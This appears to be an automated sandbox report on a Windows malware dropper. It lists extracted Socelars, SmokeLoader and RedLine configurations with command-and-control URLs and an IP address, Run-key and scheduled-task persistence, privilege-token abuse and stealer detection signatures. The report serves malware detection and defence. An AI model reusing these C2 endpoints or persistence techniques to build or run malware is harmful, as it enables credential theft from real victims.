Analysis
-
max time kernel
97s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
10-03-2022 01:04
Static task
static1
Behavioral task
behavioral1
Sample
7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe
Resource
win10v2004-en-20220113
General
-
Target
7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe
-
Size
4.2MB
-
MD5
e2138394ca78efa23b9f0cdd9677be1b
-
SHA1
592ad509f071682a32949a30c6c5121cea6b071e
-
SHA256
7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589
-
SHA512
1121fb5ae305cb0930db7c7beb312bb831fbe8f29966fde851c422766a9eafde4209f32a7df17e5bb87a8690b9e78b9a9f75fe6133e67835a381fa2310098266
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.wygexde.xyz/
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
dadad123
86.107.197.196:63065
-
auth_value
dd4834614a3ac04a7b90791c224626a2
Signatures
-
DcRat 12 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exepzyh.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exeschtasks.exeschtasks.exepid process 5904 schtasks.exe 5824 schtasks.exe 5908 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" pzyh.exe 1016 schtasks.exe 5284 schtasks.exe 5900 schtasks.exe 1608 schtasks.exe 6004 schtasks.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe 2256 schtasks.exe 6052 schtasks.exe -
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 9 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5084 4444 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1016 4444 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5900 4444 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5904 4444 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5824 4444 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2256 4444 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6052 4444 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5284 4444 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6004 4444 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/4700-377-0x0000000000DB0000-0x0000000001112000-memory.dmp family_redline behavioral2/memory/4700-388-0x0000000000DB0000-0x0000000001112000-memory.dmp family_redline behavioral2/memory/5264-393-0x0000000000EC0000-0x0000000001205000-memory.dmp family_redline behavioral2/memory/5264-402-0x0000000000EC0000-0x0000000001205000-memory.dmp family_redline behavioral2/memory/4700-403-0x0000000000DB0000-0x0000000001112000-memory.dmp family_redline behavioral2/memory/5232-395-0x0000000000420000-0x0000000000440000-memory.dmp family_redline behavioral2/memory/5264-415-0x0000000000EC0000-0x0000000001205000-memory.dmp family_redline behavioral2/memory/5264-413-0x0000000000EC0000-0x0000000001205000-memory.dmp family_redline behavioral2/memory/4700-405-0x0000000000DB0000-0x0000000001112000-memory.dmp family_redline behavioral2/memory/4076-459-0x0000000000170000-0x00000000004A7000-memory.dmp family_redline behavioral2/memory/4700-379-0x0000000000DB0000-0x0000000001112000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Installation.exe family_socelars C:\Users\Admin\AppData\Local\Temp\Installation.exe family_socelars -
suricata: ET MALWARE DCRAT Activity (GET)
suricata: ET MALWARE DCRAT Activity (GET)
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
OnlyLogger Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/4972-161-0x0000000000400000-0x00000000009B8000-memory.dmp family_onlylogger behavioral2/memory/4972-160-0x00000000001C0000-0x00000000001F0000-memory.dmp family_onlylogger behavioral2/memory/5620-430-0x0000000000840000-0x0000000000884000-memory.dmp family_onlylogger behavioral2/memory/5620-428-0x0000000000400000-0x0000000000492000-memory.dmp family_onlylogger -
Blocklisted process makes network request 1 IoCs
Processes:
cmd.exeflow pid process 281 5264 cmd.exe -
Downloads MZ/PE file
-
Executes dropped EXE 42 IoCs
Processes:
Files.exeInstall.exeKRSetp.exejg3_3uag.exeFile.exeFolder.exeInstallation.exepzyh.exepub2.exeFolder.exeInfos.exejfiag3g_gg.exejfiag3g_gg.exeIDgzLzkXcK21aBlMOtzETzcZ.exePWhSdaGNWZZnS8BjtCCZ9pOe.exezIlVU7ZogqbWpTqmVJGYv0Hh.exeapIafuakphKdmwhIYaWc_mP4.exeLJJlylsdlerbUUgUBlj_im4E.exeNmgYea8Ed5HpZgfZ6I_SyvV4.exePdMWUMUBDQaqgneMz4NAMEXR.exeVFoNhG_Zeh0WXQxnBSFaZqAE.exejmgtfwUdHp9OjWiA1hv55jGD.exeo7QhAXhuoJQjnxTdsdJdasfg.exeUxHD8WD6JzNKv1lcW6m7Keaj.exe8yPhCVbCi1c8XIP1eciLPkHT.exeV0CoOL90dCA2Fs9BKr5ffDlp.exee8ds_0qOcrUahz4Yjq0aLvxh.exe6WoEM1C6fgCRhgUAcZHi2POU.exej9JoI22bTxWmSEp1Dm9hS1RV.exedrecFYoUAZwZKDsRAB33WXoF.exe3pobJdeTncHRVAMa5wc46se6.exegtGhkMGggyQ8QkD_Z3jVqai0.exeBDJG9.exeInstall.exe7EEH0.exe1eb3a752-4420-4367-bdec-0407d20e9dc0.exe7I4LD.exe9KGM4.exeInstall.exe76G9I.exe76G9IJMD201BBH1.exegtGhkMGggyQ8QkD_Z3jVqai0.exepid process 2752 Files.exe 4972 Install.exe 4996 KRSetp.exe 3944 jg3_3uag.exe 436 File.exe 4892 Folder.exe 2612 Installation.exe 4216 pzyh.exe 2912 pub2.exe 4716 Folder.exe 1076 Infos.exe 2924 jfiag3g_gg.exe 3648 jfiag3g_gg.exe 3112 IDgzLzkXcK21aBlMOtzETzcZ.exe 4700 PWhSdaGNWZZnS8BjtCCZ9pOe.exe 4940 zIlVU7ZogqbWpTqmVJGYv0Hh.exe 1300 apIafuakphKdmwhIYaWc_mP4.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 5224 NmgYea8Ed5HpZgfZ6I_SyvV4.exe 5232 PdMWUMUBDQaqgneMz4NAMEXR.exe 5240 VFoNhG_Zeh0WXQxnBSFaZqAE.exe 5248 jmgtfwUdHp9OjWiA1hv55jGD.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5264 UxHD8WD6JzNKv1lcW6m7Keaj.exe 5272 8yPhCVbCi1c8XIP1eciLPkHT.exe 5320 V0CoOL90dCA2Fs9BKr5ffDlp.exe 5444 e8ds_0qOcrUahz4Yjq0aLvxh.exe 5620 6WoEM1C6fgCRhgUAcZHi2POU.exe 5692 j9JoI22bTxWmSEp1Dm9hS1RV.exe 5756 drecFYoUAZwZKDsRAB33WXoF.exe 5936 3pobJdeTncHRVAMa5wc46se6.exe 6032 gtGhkMGggyQ8QkD_Z3jVqai0.exe 4076 BDJG9.exe 5556 Install.exe 208 7EEH0.exe 4568 1eb3a752-4420-4367-bdec-0407d20e9dc0.exe 4888 7I4LD.exe 5508 9KGM4.exe 5800 Install.exe 4476 76G9I.exe 5816 76G9IJMD201BBH1.exe 5752 gtGhkMGggyQ8QkD_Z3jVqai0.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe vmprotect C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe vmprotect behavioral2/memory/3944-142-0x0000000000400000-0x000000000063D000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Files.exeFolder.exeInfos.exejmgtfwUdHp9OjWiA1hv55jGD.exee8ds_0qOcrUahz4Yjq0aLvxh.exe7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Files.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Folder.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Infos.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation jmgtfwUdHp9OjWiA1hv55jGD.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation e8ds_0qOcrUahz4Yjq0aLvxh.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe -
Loads dropped DLL 25 IoCs
Processes:
pub2.exerundll32.exeLJJlylsdlerbUUgUBlj_im4E.exeo7QhAXhuoJQjnxTdsdJdasfg.exeV0CoOL90dCA2Fs9BKr5ffDlp.exepid process 2912 pub2.exe 4332 rundll32.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5320 V0CoOL90dCA2Fs9BKr5ffDlp.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
9KGM4.exepzyh.exemsedge.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\identity_helper = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\telclient\\identity_helper.exe\"" Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\wscinterop\\RuntimeBroker.exe\"" Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Public\\Libraries\\dllhost.exe\"" Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\8yPhCVbCi1c8XIP1eciLPkHT = "\"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\8yPhCVbCi1c8XIP1eciLPkHT.exe\"" Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\gtGhkMGggyQ8QkD_Z3jVqai0 = "\"C:\\odt\\gtGhkMGggyQ8QkD_Z3jVqai0.exe\"" Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" 9KGM4.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" pzyh.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Recovery\\WindowsRE\\msedge.exe\"" Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\gtGhkMGggyQ8QkD_Z3jVqai0 = "\"C:\\Users\\Admin\\Documents\\8yPhCVbCi1c8XIP1eciLPkHT\\gtGhkMGggyQ8QkD_Z3jVqai0.exe\"" Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Microsoft\\Temp\\smss.exe\"" -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg3_3uag.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg3_3uag.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 245 ipinfo.io 259 ipinfo.io 13 ip-api.com 15 ipinfo.io 16 ipinfo.io 244 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe autoit_exe -
Drops file in System32 directory 2 IoCs
Processes:
description ioc process File created C:\Windows\SysWOW64\wscinterop\RuntimeBroker.exe File created C:\Windows\SysWOW64\wscinterop\9e8d7a4ca61bd9 -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
PWhSdaGNWZZnS8BjtCCZ9pOe.exeUxHD8WD6JzNKv1lcW6m7Keaj.exeapIafuakphKdmwhIYaWc_mP4.exe3pobJdeTncHRVAMa5wc46se6.exeBDJG9.exe7EEH0.exe7I4LD.exe9KGM4.exegtGhkMGggyQ8QkD_Z3jVqai0.exepid process 4700 PWhSdaGNWZZnS8BjtCCZ9pOe.exe 5264 UxHD8WD6JzNKv1lcW6m7Keaj.exe 1300 apIafuakphKdmwhIYaWc_mP4.exe 5936 3pobJdeTncHRVAMa5wc46se6.exe 1300 apIafuakphKdmwhIYaWc_mP4.exe 4076 BDJG9.exe 208 7EEH0.exe 4888 7I4LD.exe 5508 9KGM4.exe 1300 5752 gtGhkMGggyQ8QkD_Z3jVqai0.exe 1300 5752 gtGhkMGggyQ8QkD_Z3jVqai0.exe -
Drops file in Program Files directory 9 IoCs
Processes:
setup.exeapIafuakphKdmwhIYaWc_mP4.exedescription ioc process File created C:\Program Files (x86)\Common Files\Java\Java Update\9d0f9fa3bacf8c File created C:\Program Files (x86)\Microsoft\Temp\smss.exe File created C:\Program Files (x86)\Microsoft\Temp\69ddcba757bf72 File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220310192856.pma setup.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\telclient\identity_helper.exe apIafuakphKdmwhIYaWc_mP4.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\telclient\1c7346099e1d63 apIafuakphKdmwhIYaWc_mP4.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\3ff80b0c-1114-450e-8e0b-56d36e7a9174.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\telclient\identity_helper.exe apIafuakphKdmwhIYaWc_mP4.exe File created C:\Program Files (x86)\Common Files\Java\Java Update\8yPhCVbCi1c8XIP1eciLPkHT.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3476 4972 WerFault.exe Install.exe 1404 4972 WerFault.exe Install.exe 5056 4332 WerFault.exe rundll32.exe 3476 4972 WerFault.exe Install.exe 3708 4972 WerFault.exe Install.exe 5092 4972 WerFault.exe Install.exe 452 4972 WerFault.exe Install.exe 2948 4972 WerFault.exe Install.exe 1380 4972 WerFault.exe Install.exe 5368 3112 WerFault.exe IDgzLzkXcK21aBlMOtzETzcZ.exe 5632 4940 WerFault.exe zIlVU7ZogqbWpTqmVJGYv0Hh.exe 3356 5224 WerFault.exe 6012 5240 WerFault.exe VFoNhG_Zeh0WXQxnBSFaZqAE.exe 2800 5620 WerFault.exe 6WoEM1C6fgCRhgUAcZHi2POU.exe 5824 5272 WerFault.exe 5676 5240 WerFault.exe VFoNhG_Zeh0WXQxnBSFaZqAE.exe 5576 5224 WerFault.exe 3140 5620 WerFault.exe 6WoEM1C6fgCRhgUAcZHi2POU.exe 3332 5620 WerFault.exe 6WoEM1C6fgCRhgUAcZHi2POU.exe 2256 5620 WerFault.exe 6WoEM1C6fgCRhgUAcZHi2POU.exe 728 5620 WerFault.exe 6WoEM1C6fgCRhgUAcZHi2POU.exe 4672 5620 WerFault.exe 6WoEM1C6fgCRhgUAcZHi2POU.exe 6092 5620 WerFault.exe 6WoEM1C6fgCRhgUAcZHi2POU.exe 3440 5620 WerFault.exe 6WoEM1C6fgCRhgUAcZHi2POU.exe 1916 1372 WerFault.exe explorer.exe 5264 4972 WerFault.exe Install.exe 3440 4972 WerFault.exe Install.exe 4076 5196 WerFault.exe notepad.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
pub2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
o7QhAXhuoJQjnxTdsdJdasfg.exeLJJlylsdlerbUUgUBlj_im4E.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString o7QhAXhuoJQjnxTdsdJdasfg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 LJJlylsdlerbUUgUBlj_im4E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString LJJlylsdlerbUUgUBlj_im4E.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 o7QhAXhuoJQjnxTdsdJdasfg.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5908 schtasks.exe 1016 schtasks.exe 2256 schtasks.exe 6052 schtasks.exe 5284 schtasks.exe 6004 schtasks.exe 1608 schtasks.exe 5900 schtasks.exe 5904 schtasks.exe 5824 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5172 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 5380 tasklist.exe 5900 tasklist.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
msedge.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3224 taskkill.exe 4068 taskkill.exe 4576 taskkill.exe -
Modifies registry class 4 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pub2.exemsedge.exemsedge.exemsedge.exejfiag3g_gg.exepid process 2912 pub2.exe 2912 pub2.exe 4548 msedge.exe 4548 msedge.exe 1068 msedge.exe 1068 msedge.exe 4504 msedge.exe 4504 msedge.exe 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3648 jfiag3g_gg.exe 3648 jfiag3g_gg.exe 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pub2.exepid process 2912 pub2.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 4504 msedge.exe 4504 msedge.exe 4504 msedge.exe 4504 msedge.exe 4504 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
KRSetp.exeInstallation.exetaskkill.exesvchost.exedescription pid process Token: SeDebugPrivilege 4996 KRSetp.exe Token: SeCreateTokenPrivilege 2612 Installation.exe Token: SeAssignPrimaryTokenPrivilege 2612 Installation.exe Token: SeLockMemoryPrivilege 2612 Installation.exe Token: SeIncreaseQuotaPrivilege 2612 Installation.exe Token: SeMachineAccountPrivilege 2612 Installation.exe Token: SeTcbPrivilege 2612 Installation.exe Token: SeSecurityPrivilege 2612 Installation.exe Token: SeTakeOwnershipPrivilege 2612 Installation.exe Token: SeLoadDriverPrivilege 2612 Installation.exe Token: SeSystemProfilePrivilege 2612 Installation.exe Token: SeSystemtimePrivilege 2612 Installation.exe Token: SeProfSingleProcessPrivilege 2612 Installation.exe Token: SeIncBasePriorityPrivilege 2612 Installation.exe Token: SeCreatePagefilePrivilege 2612 Installation.exe Token: SeCreatePermanentPrivilege 2612 Installation.exe Token: SeBackupPrivilege 2612 Installation.exe Token: SeRestorePrivilege 2612 Installation.exe Token: SeShutdownPrivilege 2612 Installation.exe Token: SeDebugPrivilege 2612 Installation.exe Token: SeAuditPrivilege 2612 Installation.exe Token: SeSystemEnvironmentPrivilege 2612 Installation.exe Token: SeChangeNotifyPrivilege 2612 Installation.exe Token: SeRemoteShutdownPrivilege 2612 Installation.exe Token: SeUndockPrivilege 2612 Installation.exe Token: SeSyncAgentPrivilege 2612 Installation.exe Token: SeEnableDelegationPrivilege 2612 Installation.exe Token: SeManageVolumePrivilege 2612 Installation.exe Token: SeImpersonatePrivilege 2612 Installation.exe Token: SeCreateGlobalPrivilege 2612 Installation.exe Token: 31 2612 Installation.exe Token: 32 2612 Installation.exe Token: 33 2612 Installation.exe Token: 34 2612 Installation.exe Token: 35 2612 Installation.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeDebugPrivilege 3224 taskkill.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeTcbPrivilege 4044 svchost.exe Token: SeTcbPrivilege 4044 svchost.exe -
Suspicious use of FindShellTrayWindow 13 IoCs
Processes:
File.exemsedge.exepid process 436 File.exe 436 File.exe 436 File.exe 436 File.exe 436 File.exe 436 File.exe 4504 msedge.exe 3032 4504 msedge.exe 3032 3032 3032 3032 -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
File.exepid process 436 File.exe 436 File.exe 436 File.exe 436 File.exe 436 File.exe 436 File.exe -
Suspicious use of SetWindowsHookEx 27 IoCs
Processes:
